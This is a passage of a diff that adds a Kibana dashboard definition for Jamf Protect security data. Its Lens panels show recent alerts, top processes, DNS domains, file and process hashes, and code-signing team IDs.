}, + "panelIndex": "a5ced168-f931-484a-bf34-898dee052142", + "title": "High", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-56e39079-aa13-438a-8f1e-39d3d1207797", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "56e39079-aa13-438a-8f1e-39d3d1207797": { + "columnOrder": [ + "39191bf7-977f-4f41-bdf4-58d2ef9ae23a", + "ecd6f817-327d-4598-8c3a-5177c5916f7d", + "d5d9ae8b-8cf2-46dc-9f3e-0433a7097ad9", + "69fab47a-bf55-434a-93a8-755f9431e010", + "67bdcdac-9fa9-41c7-8070-3c82ae0e88a2", + "f11f1a0a-2fab-4220-9cab-08dd6518b5fa", + "eb44692c-2d2e-4f61-8883-3d24d57bdc16", + "92d876fd-cc9e-4914-a68c-f6dcbe26a803" + ], + "columns": { + "39191bf7-977f-4f41-bdf4-58d2ef9ae23a": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "\"event.module\" : \"Alerts\" or event.module : \"Threat Events Stream\" " + }, + "label": "" + } + ] + }, + "scale": "ordinal" + }, + "67bdcdac-9fa9-41c7-8070-3c82ae0e88a2": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "event id", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "event.id" + }, + "69fab47a-bf55-434a-93a8-755f9431e010": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.hostname" + }, + "92d876fd-cc9e-4914-a68c-f6dcbe26a803": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d5d9ae8b-8cf2-46dc-9f3e-0433a7097ad9": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Detection", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "event.reason" + ], + "size": 20 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "eb44692c-2d2e-4f61-8883-3d24d57bdc16": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Product module", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 50 + }, + "scale": "ordinal", + "sourceField": "event.module" + }, + "ecd6f817-327d-4598-8c3a-5177c5916f7d": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Event start", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "ms" + }, + "scale": "interval", + "sourceField": "event.start" + }, + "f11f1a0a-2fab-4220-9cab-08dd6518b5fa": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event outcome", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "event.outcome" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d5d9ae8b-8cf2-46dc-9f3e-0433a7097ad9", + "isTransposed": false, + "oneClickFilter": true, + "width": 444.875 + }, + { + "columnId": "ecd6f817-327d-4598-8c3a-5177c5916f7d", + "isTransposed": false, + "width": 239.8125 + }, + { + "columnId": "69fab47a-bf55-434a-93a8-755f9431e010", + "isTransposed": false, + "oneClickFilter": true + }, + { + "columnId": "92d876fd-cc9e-4914-a68c-f6dcbe26a803", + "hidden": true, + "isTransposed": false + }, + { + "columnId": "67bdcdac-9fa9-41c7-8070-3c82ae0e88a2", + "isTransposed": false + }, + { + "columnId": "f11f1a0a-2fab-4220-9cab-08dd6518b5fa", + "isTransposed": false + }, + { + "columnId": "39191bf7-977f-4f41-bdf4-58d2ef9ae23a", + "hidden": true, + "isTransposed": false + }, + { + "columnId": "eb44692c-2d2e-4f61-8883-3d24d57bdc16", + "isTransposed": false + } + ], + "layerId": "56e39079-aa13-438a-8f1e-39d3d1207797", + "layerType": "data", + "sorting": { + "columnId": "ecd6f817-327d-4598-8c3a-5177c5916f7d", + "direction": "desc" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "35f2db30-0cb1-4d9d-9afe-dce4d8a973c9", + "w": 48, + "x": 0, + "y": 13 + }, + "panelIndex": "35f2db30-0cb1-4d9d-9afe-dce4d8a973c9", + "title": "Most recent alerts", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fecd3402-4076-4ff6-8a63-e975ad495ec6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "fecd3402-4076-4ff6-8a63-e975ad495ec6": { + "columnOrder": [ + "8ec54088-1a34-4a07-a111-aefc56377442", + "00a2b1c5-6e79-45d9-9882-b9bf43d3869e", + "d4c8e0fc-dc51-4088-a5d4-0d183753cb5d", + "f6ebb30a-6a01-4e31-a14b-1db70cb5694f" + ], + "columns": { + "00a2b1c5-6e79-45d9-9882-b9bf43d3869e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Detection", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f6ebb30a-6a01-4e31-a14b-1db70cb5694f", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "8ec54088-1a34-4a07-a111-aefc56377442": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f6ebb30a-6a01-4e31-a14b-1db70cb5694f", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "process.name" + }, + "d4c8e0fc-dc51-4088-a5d4-0d183753cb5d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f6ebb30a-6a01-4e31-a14b-1db70cb5694f", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.hostname" + }, + "f6ebb30a-6a01-4e31-a14b-1db70cb5694f": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "8ec54088-1a34-4a07-a111-aefc56377442" + }, + { + "columnId": "f6ebb30a-6a01-4e31-a14b-1db70cb5694f" + }, + { + "columnId": "d4c8e0fc-dc51-4088-a5d4-0d183753cb5d", + "isTransposed": false + }, + { + "columnId": "00a2b1c5-6e79-45d9-9882-b9bf43d3869e", + "isTransposed": false + } + ], + "layerId": "fecd3402-4076-4ff6-8a63-e975ad495ec6", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "2fe17682-0e60-4338-a47a-971521a5e034", + "w": 24, + "x": 0, + "y": 26 + }, + "panelIndex": "2fe17682-0e60-4338-a47a-971521a5e034", + "title": "Top processes related to detection and hostname", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2c906641-fc29-4d9a-829e-c62e84234311", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2c906641-fc29-4d9a-829e-c62e84234311": { + "columnOrder": [ + "6637434f-b2a7-4ce0-b6c5-e9e93710eaac", + "a850ab61-82cf-4307-8ee9-98aadce5c6d5" + ], + "columns": { + "6637434f-b2a7-4ce0-b6c5-e9e93710eaac": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of event.action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a850ab61-82cf-4307-8ee9-98aadce5c6d5", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "a850ab61-82cf-4307-8ee9-98aadce5c6d5": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "2c906641-fc29-4d9a-829e-c62e84234311", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "a850ab61-82cf-4307-8ee9-98aadce5c6d5" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "6637434f-b2a7-4ce0-b6c5-e9e93710eaac" + ] + } + ], + "shape": "donut" + } + }, + "title": "Jamf Protect - event.action", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c21c7eaa-0dd6-4360-990c-8ef0dc734f2e", + "w": 24, + "x": 24, + "y": 26 + }, + "panelIndex": "c21c7eaa-0dd6-4360-990c-8ef0dc734f2e", + "title": "Event actions", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-9e7e8b50-1080-47d3-8575-2564576e134a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "9e7e8b50-1080-47d3-8575-2564576e134a": { + "columnOrder": [ + "d4033bf2-aecc-4d71-b065-f88b9fa3d5d5", + "f56bf86e-3e15-4657-8f5c-a828df0aa7a8" + ], + "columns": { + "d4033bf2-aecc-4d71-b065-f88b9fa3d5d5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Domain name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f56bf86e-3e15-4657-8f5c-a828df0aa7a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "dns.question.name" + }, + "f56bf86e-3e15-4657-8f5c-a828df0aa7a8": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d4033bf2-aecc-4d71-b065-f88b9fa3d5d5" + }, + { + "columnId": "f56bf86e-3e15-4657-8f5c-a828df0aa7a8" + } + ], + "layerId": "9e7e8b50-1080-47d3-8575-2564576e134a", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "c667337a-237f-4002-9f74-4d914712fde5", + "w": 24, + "x": 0, + "y": 41 + }, + "panelIndex": "c667337a-237f-4002-9f74-4d914712fde5", + "title": "Top requested DNS requests", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-7927b71e-c9eb-4afe-baa5-f19e68ca53e2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7927b71e-c9eb-4afe-baa5-f19e68ca53e2": { + "columnOrder": [ + "0daf852c-dfa5-4434-ab43-132bf0845a48", + "ab9c6f3d-8c01-4bce-8d34-918c5cabc370", + "597a615a-9b9e-42d7-9cc1-2f365dcec00c" + ], + "columns": { + "0daf852c-dfa5-4434-ab43-132bf0845a48": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of event.action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "597a615a-9b9e-42d7-9cc1-2f365dcec00c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.action" + }, + "597a615a-9b9e-42d7-9cc1-2f365dcec00c": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ab9c6f3d-8c01-4bce-8d34-918c5cabc370": { + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of event.reason", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "597a615a-9b9e-42d7-9cc1-2f365dcec00c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "event.reason" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "observer.product : \"Jamf Protect\" and event.kind : \"alert\"" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "597a615a-9b9e-42d7-9cc1-2f365dcec00c" + ], + "layerId": "7927b71e-c9eb-4afe-baa5-f19e68ca53e2", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "ab9c6f3d-8c01-4bce-8d34-918c5cabc370", + "xAccessor": "0daf852c-dfa5-4434-ab43-132bf0845a48" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "d73b82e9-36bf-4d4b-a8e5-97f2dfa66d08", + "w": 24, + "x": 24, + "y": 41 + }, + "panelIndex": "d73b82e9-36bf-4d4b-a8e5-97f2dfa66d08", + "title": "Top event actions", + "type": "lens" + }, + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Related File and Process IOCs", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 3, + "i": "d13c506e-7389-4132-abdf-f7e0edaf6e09", + "w": 48, + "x": 0, + "y": 56 + }, + "panelIndex": "d13c506e-7389-4132-abdf-f7e0edaf6e09", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "26090b76-c5f9-4191-bfef-7ff1d4482507": { + "columnOrder": [ + "dcafb40b-e7ea-45e8-8056-40375483b59a", + "d5a12d26-617f-423c-8211-ec164c9d9398", + "bc0f902d-1443-4699-930e-2eb1702aeb97" + ], + "columns": { + "bc0f902d-1443-4699-930e-2eb1702aeb97": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "d5a12d26-617f-423c-8211-ec164c9d9398": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "file path", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 50 + }, + "scale": "ordinal", + "sourceField": "file.path" + }, + "dcafb40b-e7ea-45e8-8056-40375483b59a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "sha1hex", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 50 + }, + "scale": "ordinal", + "sourceField": "file.hash.sha1" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1392e022-2f27-496c-9eb7-a0afac25bead", + "key": "file.hash.sha1", + "negate": true, + "params": { + "query": "" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "file.hash.sha1": "" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "dcafb40b-e7ea-45e8-8056-40375483b59a", + "isTransposed": false, + "oneClickFilter": true, + "width": 480 + }, + { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "isTransposed": false, + "width": 156 + }, + { + "columnId": "d5a12d26-617f-423c-8211-ec164c9d9398", + "isTransposed": false + } + ], + "headerRowHeight": "auto", + "layerId": "26090b76-c5f9-4191-bfef-7ff1d4482507", + "layerType": "data", + "paging": { + "enabled": false, + "size": 10 + }, + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": { + "dynamicActions": { + "events": [ + { + "action": { + "config": { + "openInNewTab": true + }, + "factoryId": "OPEN_IN_DISCOVER_DRILLDOWN", + "name": "Open in Discover" + }, + "eventId": "223dd31f-3469-4047-bb0b-f8ab8d530455", + "triggers": [ + "FILTER_TRIGGER" + ] + }, + { + "action": { + "config": { + "openInNewTab": true + }, + "factoryId": "OPEN_IN_DISCOVER_DRILLDOWN", + "name": "Research file path" + }, + "eventId": "60555379-bf66-4ae1-ad2c-8f96a18c47d3", + "triggers": [ + "FILTER_TRIGGER" + ] + } + ] + } + }, + "hidePanelTitles": false + }, + "gridData": { + "h": 23, + "i": "273e31c4-09aa-4378-a9e2-280c302ac86c", + "w": 19, + "x": 0, + "y": 59 + }, + "panelIndex": "273e31c4-09aa-4378-a9e2-280c302ac86c", + "title": "Top 10 file sha1hex values seen", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "26090b76-c5f9-4191-bfef-7ff1d4482507": { + "columnOrder": [ + "dcafb40b-e7ea-45e8-8056-40375483b59a", + "a7c13fe0-767c-4388-b1e4-ad6603f5a592", + "3ebc6d32-08de-4da7-ac1f-436f9cdaa138", + "bc0f902d-1443-4699-930e-2eb1702aeb97" + ], + "columns": { + "3ebc6d32-08de-4da7-ac1f-436f9cdaa138": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Executable", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 3 + }, + "scale": "ordinal", + "sourceField": "process.executable" + }, + "a7c13fe0-767c-4388-b1e4-ad6603f5a592": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "sha1hex", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "process.hash.sha1" + }, + "bc0f902d-1443-4699-930e-2eb1702aeb97": { + "dataType": "number", + "isBucketed": false, + "label": "Count of process.hash.sha256", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "process.hash.sha256" + }, + "dcafb40b-e7ea-45e8-8056-40375483b59a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "sha256hex", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "process.hash.sha256" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "observer.product : \"Jamf Protect\" and event.module : \"Alerts\" " + }, + "visualization": { + "columns": [ + { + "columnId": "dcafb40b-e7ea-45e8-8056-40375483b59a", + "isTransposed": false, + "width": 896 + }, + { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "isTransposed": false, + "width": 156 + }, + { + "columnId": "3ebc6d32-08de-4da7-ac1f-436f9cdaa138", + "isTransposed": false + }, + { + "columnId": "a7c13fe0-767c-4388-b1e4-ad6603f5a592", + "isTransposed": false + } + ], + "headerRowHeight": "auto", + "layerId": "26090b76-c5f9-4191-bfef-7ff1d4482507", + "layerType": "data", + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 23, + "i": "ecb673d5-334d-4705-ac46-1f4878937090", + "w": 29, + "x": 19, + "y": 59 + }, + "panelIndex": "ecb673d5-334d-4705-ac46-1f4878937090", + "title": "Top 10 process shahex values by process executable", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-26090b76-c5f9-4191-bfef-7ff1d4482507", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "26090b76-c5f9-4191-bfef-7ff1d4482507": { + "columnOrder": [ + "a7c13fe0-767c-4388-b1e4-ad6603f5a592", + "dcafb40b-e7ea-45e8-8056-40375483b59a", + "3ebc6d32-08de-4da7-ac1f-436f9cdaa138", + "bc0f902d-1443-4699-930e-2eb1702aeb97" + ], + "columns": { + "3ebc6d32-08de-4da7-ac1f-436f9cdaa138": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Executable", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "process.executable" + }, + "a7c13fe0-767c-4388-b1e4-ad6603f5a592": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process SigningID", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "process.code_signature.signing_id" + }, + "bc0f902d-1443-4699-930e-2eb1702aeb97": { + "dataType": "number", + "isBucketed": false, + "label": "Count of process.code_signature.team_id", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "process.code_signature.team_id" + }, + "dcafb40b-e7ea-45e8-8056-40375483b59a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process SigningTeamID", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 50 + }, + "scale": "ordinal", + "sourceField": "process.code_signature.team_id" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "observer.product : \"Jamf Protect\" and event.module : \"Alerts\" and NOT process.code_signature.signing_id:com.apple.*" + }, + "visualization": { + "columns": [ + { + "columnId": "dcafb40b-e7ea-45e8-8056-40375483b59a", + "isTransposed": false, + "width": 896 + }, + { + "columnId": "bc0f902d-1443-4699-930e-2eb1702aeb97", + "isTransposed": false, + "width": 156 + }, + { + "columnId": "3ebc6d32-08de-4da7-ac1f-436f9cdaa138", + "isTransposed": false + }, + { + "columnId": "a7c13fe0-767c-4388-b1e4-ad6603f5a592", + "isTransposed": false + } + ], + "headerRowHeight": "auto", + "layerId": "26090b76-c5f9-4191-bfef-7ff1d4482507", + "layerType": "data", + "rowHeight": "auto" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "description": "Apple's signed binaries are not bound to an TeamID.", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "e5f7a9d1-2951-4189-b17b-9657bc27a70e", + "w": 48, + "x": 0, + "y": 82 + }, + "panelIndex": 